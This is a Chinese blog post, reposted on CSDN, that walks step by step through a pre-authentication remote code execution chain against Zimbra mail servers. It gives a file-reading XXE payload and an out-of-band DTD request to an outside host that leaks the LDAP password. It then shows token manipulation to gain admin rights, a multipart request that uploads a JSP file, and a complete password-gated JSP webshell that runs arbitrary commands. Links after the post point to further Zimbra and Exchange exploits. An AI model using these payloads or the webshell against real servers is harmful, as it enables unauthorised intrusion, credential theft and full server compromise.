关于zimbra的复现以及突破

最新推荐文章于 2022-10-26 21:08:06 发布
最新推荐文章于 2022-10-26 21:08:06 发布
阅读量651 收藏
点赞数
文章标签: 数据库 java runtime
原文链接:http://www.cnblogs.com/abubu/p/10741381.html
版权

Zimbra未登录RCE漏洞利用

首先我是根据这个PDF进行复现的,但是复现过程出现很多问题

首先使用这个XXE读取文件

<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
      <EMailAddress>aaaaa</EMailAddress>
      <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
    </Request>
  </Autodiscover>

如果成功就可以继续了,然后使用

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: mail.xx.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Referer:https://mail.xx.com/zimbra/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZM_TEST=true; ZM_LOGIN_CSRF=3d4a039e-0047-4828-aad1-326545bbb903
Content-Length: 348

<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://xss.com/dtd">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>

出现http503以及普通权限账号记录下来<key name="zimbra_ldap_passwd">后面的value记录下来

下一步要记得地址改成/service/soap

最后获取ZM_ADMIN_AUTH_TOKEN的时候,COOKIE那里:改成ZM_ADMIN_AUTH_TOKEN=普通权限的TOKEN

最后一步上传shell的时候, 一直提示上传文件失败如图(这里困扰了很多人,包括T00ls的很多人)

photo_2019-04-09_19-46-35.jpg

直接给包

POST /service/extension/clientUploader/upload HTTP/1.1
Host: mail.xx.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1orxAOGlJBBcOmuz
Content-Length: 353
Cookie:ZM_ADMIN_AUTH_TOKEN=0_530bf417d0f3e55ed628e4671e44b1dea4652bab_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343835323934303131393b61646d696e3d313a313b
Upgrade-Insecure-Requests:1

------WebKitFormBoundary1orxAOGlJBBcOmuz
Content-Disposition:form-data;name="file";filename="abu.jsp"
Content-Type: image/jpeg

asasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasasV
------WebKitFormBoundary1orxAOGlJBBcOmuz--

 

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1orxAOGlJBBcOmuz

必须要加上这一句

最后再给一个能执行命令的马,找了几个都报500错误

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>���(l</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>

 

使用方法??pwd=admin&cmd=whoami

带Cookie访问webshell可以使用火狐的Modify Headers插件,发现只有在downloads目录才需要带cookie,根目录下的/js /img都不需要!

参考链接:

https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html 

https://blog.csdn.net/fnmsd/article/details/88657083

http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448

http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd

https://www.t00ls.net/thread-50662-1-1.html

转载于:https://www.cnblogs.com/abubu/p/10741381.html

weixin_30721077
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
邮箱部署zimbra
01-06
邮箱服务器部署
Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞
部分学习记录
03-12 1941
炒冷饭:cve-2019-9670 xxe + cve-2019-9621 ssrf
CVE-2022-27925 Zimbra任意文件上传漏洞
热爱学习,喜欢折腾!
10-26 3023
Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。它最大的特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox,Safari和IE浏览器。Zimbra Collaboration(又称ZCS)8.8.15和9.0具有mboximport功能,可接收ZIP存档并从中提取文件,具有管理员权限的认证用户可以将任意文件上传到系统中,从而导致目录遍历或远程代码执行。
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
include_voidmain的博客
07-07 2330
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
[EXP]CVE-2019-9621 Zimbra<8.8.11 GetShell Exploit(配合Cscan可批量)
weixin_30414245的博客
05-06 921
时间 2019年03月18日 威胁目标 采用Zimbra邮件系统的企业 主要风险 远程代码执行 攻击入口 localconfig.xml 配置文件 使用漏洞 CVE-2019-9621 受影响应用 ZimbraCollabora...
Zimbra xxe+ssrf导致getshell
一个安全研究员
03-26 6213
我分析的第一个java漏洞
zmzcoreport:Zimbra ZCO 报告脚本
06-09
Zimbra ZCO 报告脚本概述根据 Zimbra 邮箱.log 文件报告当前使用的 Zimbra Connector for Outlook 版本。 此脚本将报告以空格分隔的登录日期、名称和地址、ZCO 版本、使用此版本的最近日期以及可以在日志文件中找到...
Zimbra Multi-Server Installation Guide
04-01
Zimbra Multi-Server Installation Guide
zimbra:安装和配置Zimbra Collaboration Open Source Edition的角色
01-31
在Red Hat,CentOS和Ubuntu Server上安装和配置Zimbra Collaboration Open Source Edition的非官方角色。 要求 2.9.6或更高。 安装 Zimbra已经在Ansible Galaxy中,因此只需在ansible-galaxy命令中在计算机中安装此...
Zimbra工具
11-17
Zimbra是一家提供专业的电子邮件软件开发供应商
Zimbra 小于 8.8.11版本 XXE GetShell EXP.rar
05-08
Zimbra邮件系统<8.8.11 XXE SSRF远程代码执行漏洞GetShell 漏洞描述: 漏洞是利用XXE和ProxyServlet SSRF 漏洞拿到 admin authtoken 后,通过文件上传在服务端执行任意代码,威胁程度极高。当Zimbra服务端打来Memcached缓存服务是,可以利用SSRF攻击进行反序列化执行远程代码。不过由于Zimbra在单服务器安装中尽管Memcached虽然启动但是并没有进行使用,所以其攻击场景受到限制。 影响版本: ZimbraCollaboration Server 8.8.11 之前的版本都受到影响。具体来说: 1. Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实远程代码执行。 2. Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实远程代码执行。
Zimbra SSRF+Memcached+反序列化漏洞利用
fnmsd的博客
04-12 8255
前言 之前懒了一下,没memcached反序列化的部分。 在看本文之前请先看完上一篇: https://blog.csdn.net/fnmsd/article/details/88657083 本篇基于8.7.11进行,就是官网上直接下的。 纯技术研究,请勿使用在非法用途。 环境搭建 直接用docker,https://hub.docker.com/r/jorgedlcruz/zi...
Exchange 自动发服务(Auto discover service)详解
weixin_33736649的博客
09-06 1017
Autodiscover Service概述: Autodiscover 服务可以让你快速的配置Outlook 2007 或者Outlook 2010 以及一些移动设备,Autodiscover Service 无法应用在早期的Outlook 版本,如Outlook 2003。在早期版本的Microsoft Exchange(Exchange 2003 SP2或更早版...
自动发服务深入理解
weixin_34281537的博客
04-23 1818
http://mscerts.programming4.us/application_server/exchange%20server%202010%20autodiscover%20%20%20autodiscover%20concepts.aspx http://sysadmin-e.com/exchange-scp http://exchangeserverpro.com/modifying...
获得用户完整的autodiscover配置文件
weixin_34351321的博客
04-24 2338
outlook 2016 无法自定义配置exchange邮箱,需要使用自动发来配置,但在配置过程中,经常出异常的错误,导致无法通过。 之前的文章介绍了通过使用注册表指定autodiscover.xml的方法配置outlook,如有需要请查看:http://www.cnblogs.com/-windows/p/8856123.html 下面介绍的是获取用户完整的配置文件,将此配置文件放置在用...
(环境搭建+)CVE-2021-26855 2021年3月 Exchange Server RCE
daxi0ng的博客
03-16 6378
0x00 简介 Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。 0x01 漏洞概述 CVE-2021-26855 该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。 危害:该漏洞是Exch
【安全漏洞】简要分析了最近的ProxyShell利用链
HBohan的博客
08-29 812
前言 近日,有研究员公布了自己针对微软的Exchange服务的攻击链的3种利用方式。微软官方虽然出了补丁,但是出于种种原因还是有较多用户不予理会,导致在仍然有许多有漏洞的服务暴露在公网中,本文主要在原理上简要分析了最近的ProxyShell利用链。 1.ProxyLogon: The most well-known pre-auth RCE chain 2.ProxyOracle: A plaintext-password recovery attacking chain 3.ProxyShell:
《A Saga of Code Executions on Zimbra》RCE漏洞分析+过程
热门推荐
fnmsd的博客
03-21 1万+
原文地址: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://paper.tuisec.win/detail/8ac5a3d1efbf40b 下载Zimbra的包: 1.从地址https://www.zimbra.com/downloads/zimbra-collaboration-ope...
zimbra docker
最新发布
08-19
Zimbra 是一种企业级邮件和协作平台,而 Docker 是一种容器化平台。如果你想在 Docker 中部署 Zimbra,你可以使用有的 Zimbra Docker 镜像来进行部署。 Zimbra Docker 镜像是由社区开发的,可以在 Docker Hub 上找到。你可以使用以下命令从 Docker Hub 下载并运行 Zimbra Docker 镜像: ``` docker run --name zimbra -p 25:25 -p 80:80 -p 443:443 -p 587:587 -p 110:110 -p 143:143 \ -p 993:993 -p 995:995 -p 5222:5222 -p 7071:7071 \ -h mail.example.com \ -d zimbra/zimbra-community-edition ``` 上述命令将创建一个名为 "zimbra" 的容器,并启动 Zimbra 社区版。你可以根据需要修改端口映射和主机名等参数。请确保在运行之前已经安装了 Docker。 请注意,Zimbra Docker 镜像是由社区维护的,不属于官方支持范围之内。因此,在使用之前,请查阅相关文档和社区讨论以获取更多信息和支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值